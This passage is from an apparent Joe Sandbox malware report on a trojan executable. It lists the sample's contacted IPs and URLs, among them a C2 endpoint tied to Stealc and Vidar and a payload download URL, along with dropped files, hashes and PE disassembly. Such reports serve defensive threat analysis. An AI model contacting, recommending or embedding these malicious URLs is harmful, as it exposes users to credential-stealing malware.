http://62.204.41.151/	19%	Virustotal		Browse
https://iplogger.co/	4%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
iplogger.co	172.67.167.249	true	false	4%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://62.204.41.151/edd20096ecef326d.php	true	18%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://iplogger.co/1vM485	false	3%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://62.204.41.151/	true	19%, Virustotal, Browse Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://62.204.41.151/ows	169F.tmp.exe, 00000003.00000002.1459972302.00000000008AB000.00000004.00000020.00020000.00000000.sdmp	false	14%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://62.204.41.151/edd20096ecef326d.phpRC)L	169F.tmp.exe, 00000003.00000002.1459972302.00000000008AB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://62.204.41.151/ScreenUpdateSync.exe	4h1Zc12ZBe.exe, 4h1Zc12ZBe.exe, 00000000.00000002.2480794117.0000000000747000.00000004.00000020.00020000.00000000.sdmp, 4h1Zc12ZBe.exe, 00000000.00000003.1250987099.000000000074B000.00000004.00000020.00020000.00000000.sdmp, 4h1Zc12ZBe.exe, 00000000.00000002.2480794117.00000000006CE000.00000004.00000020.00020000.00000000.sdmp	false	21%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://62.204.41.151w	169F.tmp.exe, 00000003.00000002.1459972302.00000000008C9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://62.204.41.151/ScreenUpdateSync.exe.exeupload.prtscreen.app/upload.php----BOUNDARYBOUNDARY----	4h1Zc12ZBe.exe	false	14%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://iplogger.co/1vM485h	4h1Zc12ZBe.exe, 00000000.00000003.1233558531.0000000000751000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://iplogger.co/L	4h1Zc12ZBe.exe, 00000000.00000002.2480794117.0000000000719000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://iplogger.co/1vM485vector	4h1Zc12ZBe.exe	false	3%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://62.204.41.151	169F.tmp.exe, 00000003.00000002.1459877120.000000000083E000.00000004.00000020.00020000.00000000.sdmp, 169F.tmp.exe, 00000003.00000002.1459972302.000000000087A000.00000004.00000020.00020000.00000000.sdmp	true	19%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://iplogger.co/1vM485#	4h1Zc12ZBe.exe, 00000000.00000003.1233558531.0000000000751000.00000004.00000020.00020000.00000000.sdmp	false	3%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://62.204.41.151/edd20096ecef326d.phpttv	169F.tmp.exe, 00000003.00000002.1459972302.00000000008C9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://upx.sf.net	Amcache.hve.19.dr	false	URL Reputation: safe	unknown
http://62.204.41.151/edd20096ecef326d.phpFC%L	169F.tmp.exe, 00000003.00000002.1459972302.00000000008AB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://62.204.41.151/0$	169F.tmp.exe, 00000003.00000002.1459972302.000000000087A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://62.204.41.151L	169F.tmp.exe, 00000003.00000002.1459877120.000000000083E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://iplogger.co/	4h1Zc12ZBe.exe, 00000000.00000002.2480794117.0000000000719000.00000004.00000020.00020000.00000000.sdmp	false	4%, Virustotal, Browse Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
62.204.41.151	unknown	United Kingdom		30798	TNNET-ASTNNetOyMainnetworkFI	true
172.67.167.249	iplogger.co	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1497246
Start date and time:	2024-08-22 09:23:07 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 51s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	25
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	4h1Zc12ZBe.exe renamed because original name is a hash value
Original Sample Name:	2a862d97cc67da2511680862033b5228.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@4/7@1/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 46 Number of non-executed functions: 233
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe, UsoClient.exe
Excluded IPs from analysis (whitelisted): 20.42.65.92
Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, settings-win.data.microsoft.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
03:23:59	API Interceptor	1x Sleep call for process: 4h1Zc12ZBe.exe modified
03:24:21	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
62.204.41.151	ErY04mobsp.exe	Get hash	malicious	Stealc, Vidar	Browse	62.204.41.151/edd20096ecef326d.php
	ColWEdaZpz.exe	Get hash	malicious	Stealc	Browse	62.204.41.151/edd20096ecef326d.php
	SecuriteInfo.com.Win32.BootkitX-gen.24236.15066.exe	Get hash	malicious	Stealc, Vidar	Browse	62.204.41.151/edd20096ecef326d.php
	BoP1sOpkOT.dll	Get hash	malicious	Amadey	Browse	62.204.41.151/8vcWxwwx3/index.php?wal=1
	BoP1sOpkOT.dll	Get hash	malicious	Amadey	Browse	62.204.41.151/8vcWxwwx3/index.php?wal=1
172.67.167.249	dlcdkJcbbV.exe	Get hash	malicious	LummaC, RedLine	Browse
	1Vkf7silOj.exe	Get hash	malicious	LummaC, Amadey, Mars Stealer, PureLog Stealer, RedLine, SmokeLoader, Stealc	Browse
	hsRju5CPK2.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, zgRAT	Browse
	https://prezi.com/i/view/0dF0780HKO9RqC8umFaJ	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
iplogger.co	Setup3.exe	Get hash	malicious	Unknown	Browse	104.21.76.57
	file.exe	Get hash	malicious	Unknown	Browse	104.21.76.57
	SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Get hash	malicious	DarkTortilla	Browse	172.67.188.178
	file.exe	Get hash	malicious	DarkTortilla	Browse	172.67.188.178
	yLfAxBEcuo.exe	Get hash	malicious	Cryptbot, Vidar, Xmrig	Browse	172.67.188.178
	encrypter-windows-x86.exe	Get hash	malicious	Unknown	Browse	104.21.82.93
	encrypter-windows-x86.exe	Get hash	malicious	Unknown	Browse	104.21.82.93
	Arc453466701.msi	Get hash	malicious	Unknown	Browse	104.21.76.57
	Arc453466701.msi	Get hash	malicious	Metamorfo	Browse	104.21.76.57
	Arc453466701.msi	Get hash	malicious	Metamorfo	Browse	104.21.76.57

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	lYL8naoHXw.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	vwAGeX1bR4.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	104.21.69.39
	uV7ttrc7wN.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	172.67.166.231
	FBS2024000000392.docx	Get hash	malicious	Unknown	Browse	188.114.96.3
	http://lisasierra.com	Get hash	malicious	Unknown	Browse	104.17.25.14
	FBS2024000000392.docx	Get hash	malicious	Unknown	Browse	188.114.97.3
	https://www.yumpu.com/xx/document/read/68781894/noblehorizonsfaxpay34443	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	QUOTATION - RFQ# 2200002827.exe	Get hash	malicious	FormBook	Browse	172.67.176.77
	NEW.P.ORDER .ENQUIRY56433.PDF.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	PI 22_8_2024.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.13.205
TNNET-ASTNNetOyMainnetworkFI	ErY04mobsp.exe	Get hash	malicious	Stealc, Vidar	Browse	62.204.41.151
	sora.arm7.elf	Get hash	malicious	Mirai	Browse	217.112.243.177
	ColWEdaZpz.exe	Get hash	malicious	Stealc	Browse	62.204.41.151
	SecuriteInfo.com.Win32.BootkitX-gen.24236.15066.exe	Get hash	malicious	Stealc, Vidar	Browse	62.204.41.151
	SecuriteInfo.com.Linux.Siggen.9999.26913.14039.elf	Get hash	malicious	Unknown	Browse	62.204.41.39
	botx.arm6.elf	Get hash	malicious	Mirai	Browse	217.112.243.190
	4F26B9B399E238579178958FC76C17AB1A605A33CB6BD6D47AAC073596A2DEE6.exe	Get hash	malicious	Bdaejec, Mars Stealer, RedLine, Vidar	Browse	62.204.41.166
	SecuriteInfo.com.ELF.DDOSAgent-CF.6640.9775.elf	Get hash	malicious	Unknown	Browse	62.204.41.39
	SecuriteInfo.com.Linux.Siggen.9999.30839.3607.elf	Get hash	malicious	Mirai	Browse	62.204.41.39
	SecuriteInfo.com.Linux.Siggen.9999.27898.12809.elf	Get hash	malicious	Mirai	Browse	62.204.41.39

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	FBS2024000000392.docx	Get hash	malicious	Unknown	Browse	172.67.167.249
	#U0421#U041c#U0413#U0421 #U0412#U0430#U0433#U043e#U043d #U211628870905.exe	Get hash	malicious	FormBook, GuLoader	Browse	172.67.167.249
	Request for Quotation + sample catalog.vbs	Get hash	malicious	FormBook	Browse	172.67.167.249
	222dcontrato2024.LnK.lnk	Get hash	malicious	Unknown	Browse	172.67.167.249
	waybill_original_invoice_bl_packing_list_shipment_22_08_2024_00000_pdf.vbs	Get hash	malicious	GuLoader, Remcos	Browse	172.67.167.249
	SecuriteInfo.com.Win64.SpywareX-gen.26829.18381.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	172.67.167.249
	Tweak.reg	Get hash	malicious	LummaC	Browse	172.67.167.249
	SecuriteInfo.com.Win32.CrypterX-gen.19624.6979.exe	Get hash	malicious	Clipboard Hijacker, PureLog Stealer, RedLine, zgRAT	Browse	172.67.167.249
	Payment_Confirmation_Advice_150000-0000837849_pdf.vbs	Get hash	malicious	Remcos, GuLoader	Browse	172.67.167.249
	Synaptics.exe	Get hash	malicious	XRed	Browse	172.67.167.249

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_169F.tmp.exe_ed3ab59d9f6ad851eac909f69cfe9f5ed6ba974_f2f091c5_808bb754-d95e-4350-97da-f57f90168c55\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9657097989012859
Encrypted:	false
SSDEEP:	192:/n+wbCHuAg0OaNqE1jEhZrMZtzuiFnZ24IO8srTH:uHuA7OaNHjbTzuiFnY4IO8KT
MD5:	CE4D264FDCB39DD3661CCC00E1963AE6
SHA1:	347D5C451771BBE356593990C67A0E71FF1FFBFC
SHA-256:	4D210B1955AAD25F19958ECCA5B1C2A3E4C72E01CC27DFC8609A55C0A93F457C
SHA-512:	8E05F96C8F13D5415C948DC7535DB459BF4F13F5507EA5FDCD11B145F06CBF03F607AF99270CB0E8CE33F5E3701E152BB7B155974BAB781FFCB870A620303D15
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.8.7.8.5.0.5.8.1.9.7.8.8.8.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.8.7.8.5.0.5.9.1.1.9.7.8.1.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.0.8.b.b.7.5.4.-.d.9.5.e.-.4.3.5.0.-.9.7.d.a.-.f.5.7.f.9.0.1.6.8.c.5.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.5.8.8.5.7.b.e.-.5.9.5.1.-.4.4.0.c.-.9.a.1.e.-.f.b.2.b.a.4.a.b.a.e.1.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.1.6.9.F...t.m.p...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.5.0.-.0.0.0.1.-.0.0.1.4.-.7.e.8.0.-.7.4.4.2.6.4.f.4.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.d.4.0.1.e.d.e.3.f.9.6.f.9.5.a.a.c.d.c.5.d.b.2.3.c.c.6.a.0.f.d.0.0.0.0.7.e.2.a.!.0.0.0.0.4.6.c.c.9.a.d.0.d.a.5.6.4.d.3.8.8.9.b.d.5.a.8.3.0.3.a.d.f.b.8.3.7.1.e.6.f.1.e.d.!.1.6.9.F...t.m.p...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1F69.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Thu Aug 22 07:24:18 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	65696
Entropy (8bit):	2.0401296064595082
Encrypted:	false
SSDEEP:	192:tsahGOKXnx9rivu2XeOkOJwehAU4nXWhyAXx6V4Hvvat3yRBocehovK9hl1AYuZu:Nli9evNkENh6Ah6V4pRvRBuD5WQ2Ha
MD5:	E4869BD75CD0E3BB8F4DECADCF6F1584
SHA1:	C02BEDF9854A89DE5D74FE94B45E5FAB41BF0F95
SHA-256:	71031F51FCA2B6892CF8219418E5E84C066F435456B258346A030AD409AD7CE2
SHA-512:	0DEC90D3B5A4A9FAF5A02753AE5D080E3910FA80478F2A2703F01735775B34D0B0957048267E5A420BEBA0C25D41BD7B6D2A1DE5A57A30EB0D69A204FED688DE
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... ..........f............4...............<............*..........T.......8...........T............2..........................................................................................................eJ......H.......GenuineIntel............T.......P......f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2219.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8316
Entropy (8bit):	3.6954797432530864
Encrypted:	false
SSDEEP:	192:R6l7wVeJEq669i6Yah6SgmferpDM89bO0sfE6m:R6lXJR616Y06SgmfeHOnfo
MD5:	2BB2DCFA3AF1B0E6E502D28A4E834588
SHA1:	5F919B64AA6A99EBB691100BCE9EEAFC56ACF9A3
SHA-256:	1C0A468B35129B498AC9E448FAD66F9F6B8D07C618D7DF7BCB285049B5011B3C
SHA-512:	3D54C57AC7A1E9F733336AEA90EA46015DADCE7F0BC6B02697E4E008EA359FC282668C03946B418B619AC19F390A079A38EF03B44A88EE317A644AAAE8038C80
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.4.8.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2259.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4569
Entropy (8bit):	4.441029900119873
Encrypted:	false
SSDEEP:	48:cvIwWl8zsxJg77aI9YfrWpW8VYoYm8M4Jm6FUH+q8qSLx9vxad:uIjfDI72fa7V8J6m7xad
MD5:	95EA1EF2DC59F8485C0257E175ED604C
SHA1:	359650AF2F28793B9C75E5EDDFC068407C7A0753
SHA-256:	BAA64F5AD338034B8A06AE565E0F4CC240519253958450CC895071E5021C28C5
SHA-512:	75512E7E1D375ABE817551012DA93AD4814CEA04025A1365FE69919A6E091C2EB883BFE308BC74EB333F77AB2F86CADC96C75B55AAB9CF01672DFD0BE7DD1FE8
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="466467" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\ScreenUpdateSync[1].exe

Download File

Process:	C:\Users\user\Desktop\4h1Zc12ZBe.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	367616
Entropy (8bit):	6.014310133820107
Encrypted:	false
SSDEEP:	6144:o3rlQRatmQe795/W6dK9Lj89wkxMuqmeTpj2:o3r+atsDWb9P89TxMuq
MD5:	D1B7450967D42B98290D97DD1A8CFA6D
SHA1:	46CC9AD0DA564D3889BD5A8303ADFB8371E6F1ED
SHA-256:	42263DADEAA5FDDDB9CAF84D2C3FE96A75832A058EC92D3B1C8221382E3BC232
SHA-512:	83F0E043542D4AB8ED2230463966328C3596BA3E11A4B893DE0A56A62622EBFB641FA0823670A26D65F267D73500B43CAA4184FFCF1555D813053290D3BDC97D
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Virustotal, Detection: 34%, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........%...KN..KN..KN...N..KN...N..KN...N..KN...N..KN..JN..KN...N..KN...N..KN...N..KNRich..KN................PE..L....6;e.....................*.......I............@..........................0$................................................d....P...~..........................................................2..@............................................text...v........................... ..`.data............v..................@....rsrc........P......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\169F.tmp.exe

Download File

Process:	C:\Users\user\Desktop\4h1Zc12ZBe.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	367616
Entropy (8bit):	6.014310133820107
Encrypted:	false
SSDEEP:	6144:o3rlQRatmQe795/W6dK9Lj89wkxMuqmeTpj2:o3r+atsDWb9P89TxMuq
MD5:	D1B7450967D42B98290D97DD1A8CFA6D
SHA1:	46CC9AD0DA564D3889BD5A8303ADFB8371E6F1ED
SHA-256:	42263DADEAA5FDDDB9CAF84D2C3FE96A75832A058EC92D3B1C8221382E3BC232
SHA-512:	83F0E043542D4AB8ED2230463966328C3596BA3E11A4B893DE0A56A62622EBFB641FA0823670A26D65F267D73500B43CAA4184FFCF1555D813053290D3BDC97D
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Virustotal, Detection: 34%, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........%...KN..KN..KN...N..KN...N..KN...N..KN...N..KN..JN..KN...N..KN...N..KN...N..KNRich..KN................PE..L....6;e.....................*.......I............@..........................0$................................................d....P...~..........................................................2..@............................................text...v........................... ..`.data............v..................@....rsrc........P......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.416603866950043
Encrypted:	false
SSDEEP:	6144:2cifpi6ceLPL9skLmb0moSWSPtaJG8nAgex285i2MMhA20X4WABlGuNe5+:Ti58oSWIZBk2MM6AFBco
MD5:	7B55B7D593BC86230A29C47C03A1FFD0
SHA1:	C999D138028F465F2601DE44280F7E95DCDD63AD
SHA-256:	50611B9E4DAACD5AE9A8A4F0AECA165A1675F205B96B49B643E842406FF75879
SHA-512:	6BD730793B1516E5F4D0F5DCCE5BE839C426A3D9CA803D0E116A5D84F74A061BCE7A02FDC4DFCBC4BF98D1B54E2F7EA77C38DD01A03D8C588819AFEE0439532D
Malicious:	false
Reputation:	low
Preview:	regfE...E....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmr.Ld.................................................................................................................................................................................................................................................................................................................................................x........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.582134482226164
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	4h1Zc12ZBe.exe
File size:	371'712 bytes
MD5:	2a862d97cc67da2511680862033b5228
SHA1:	2a7e8253a766bb23ab0659f45e1a15c1b914238b
SHA256:	eba7df179c830bbead2a78934f2bf3e77fcc4aacf90b69c5be49a2fa68adf8b4
SHA512:	796e14839a523210cf3518b9905b6d28b69c7a6a1f0870ddef6cef8efd1422ac923a961913ab6b1a61b69e28bf46a29c2a5f0096d331d08ac40be206f1c70036
SSDEEP:	6144:iq8vMRj++osNEKDuiIsyW1+1W2zHRtnnY9JVwcq3Uv1pAOz3wxd3GN1l:l8b+Hg7satRtY9vWMpRwNk
TLSH:	D5849E117AC1D0BAC17306318E24E6B65AFE79604D359A6B37E8071EEF74083E539F62
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........M...,...,...,..n.6..,..n.4.G,..n.5..,...D...,...D...,...D...,...TD..,...TT..,...,...,..qE...,..qE8..,...,P..,..qE...,..Rich.,.

File Icon


Icon Hash:	46c7c30b0f4e0d59

Static PE Info

General

Entrypoint:	0x407d4f
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x66C0472C [Sat Aug 17 06:46:04 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	4a86d6bd6da9a8dd32c68e84b5f90647

Entrypoint Preview

Instruction
call 00007FBCA8F29EB3h
jmp 00007FBCA8F2947Fh
mov ecx, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], ecx
pop ecx
pop edi
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
push ecx
ret
mov ecx, dword ptr [ebp-10h]
xor ecx, ebp
call 00007FBCA8F29324h
jmp 00007FBCA8F295E0h
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [00451064h]
xor eax, ebp
push eax
push dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFFh
lea eax, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], eax
ret
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [00451064h]
xor eax, ebp
push eax
mov dword ptr [ebp-10h], eax
push dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFFh
lea eax, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], eax
ret
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [00451064h]
xor eax, ebp
push eax
mov dword ptr [ebp-10h], esp
push dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFFh

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x4f124	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x55000	0x91b0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x4a0b0	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x4a0e8	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x3b000	0x308	.rdata
